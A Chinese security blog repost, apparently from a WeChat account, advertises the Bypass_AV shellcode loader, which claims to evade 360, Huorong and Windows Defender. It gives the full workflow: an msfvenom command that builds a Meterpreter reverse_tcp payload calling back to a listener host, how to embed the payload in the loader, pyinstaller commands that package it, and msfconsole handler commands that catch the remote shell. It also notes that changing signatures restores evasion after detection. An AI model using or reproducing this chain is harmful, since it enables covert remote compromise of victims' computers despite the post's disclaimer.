免杀ShellCode加载器 ,360、火绒、Windows Defender

admin 2022年5月24日01:09:20评论166 views字数 1634阅读5分26秒阅读模式

扫码领资料

获黑客教程

免费&进群

免杀ShellCode加载器 ,360、火绒、Windows Defender
免杀ShellCode加载器 ,360、火绒、Windows Defender




随着WAF产品

作者:Axx8


Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender

代码够简单,估计要不了多久就进特征库了,被杀了再去改几个特征码照样又可以免杀,作者的github保持更新,可以去瞅瞅。


项目地址:https://github.com/Axx8/Bypass_AV

环境

2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows DefenderWindows 10 64位 360&火绒&Windows DefenderWindows 7 64位 或以上操作系统应该都没问题(没有测试)


该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!


代码未经过大量测试,如发现问题请提交 issue。

使用msfvenom

生成ShellCode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=8080 --encrypt base64 -f c

注意:ShellCode 需要是64位的


免杀ShellCode加载器 ,360、火绒、Windows Defender


加载器

将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处


注意:保留原始ShellCode 里的双引号 "


示例:


免杀ShellCode加载器 ,360、火绒、Windows Defender


最终格式:


免杀ShellCode加载器 ,360、火绒、Windows Defender


打包成可执行程序


编译

Python 3.8.6

pyinstaller 4.7

pip install pyinstaller pyinstaller -F -w Bypss_AV.py

生成Bypass_AV.exe在dist目录中


运行监听

msfconsolemsf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 0.0.0.0msf6 exploit(multi/handler) > set lport 8080msf6 exploit(multi/handler) > run


Bypass_360视频


https://user-images.githubusercontent.com/34683107/167286823-a93fdd69-547e-4adc-9ae5-171fb0e919ca.mov

Bypass_火绒视频

https://user-images.githubusercontent.com/34683107/167286897-a482c486-c3e9-4f69-ae55-98afd2ff1ed7.mov


Bypass_Windows Defender视频


https://user-images.githubusercontent.com/34683107/167286874-9413611e-c2be-4cfb-ba51-f95ebe5518af.mov


或者直接去作者的github上查看

声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本公众号及原作者不承担相应的后果.


@

学习更多渗透技能!体验靶场实战练习


免杀ShellCode加载器 ,360、火绒、Windows Defender

hack视频资料及工具

免杀ShellCode加载器 ,360、火绒、Windows Defender

(部分展示)


往期推荐



HW中内网代理常用工具总结

个人腾讯服务器挖矿木马溯源

实战 | 记一次授权网络攻防演练(上)

记一次hw期间的溯源过程

漏洞挖掘|密码找回中的套路

Xray捡洞中的高频漏洞

网络安全人员需要考的几本(含金量高)的证书!

爬取免费代理,拥有自己的代理池

APP渗透—Android 7.0 抓包(教程)


看到这里了,点个“赞”、“再看”吧

原文始发于微信公众号(白帽子左一):免杀ShellCode加载器 ,360、火绒、Windows Defender

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月24日01:09:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   免杀ShellCode加载器 ,360、火绒、Windows Defenderhttp://cn-sec.com/archives/1042447.html

发表评论

匿名网友 填写信息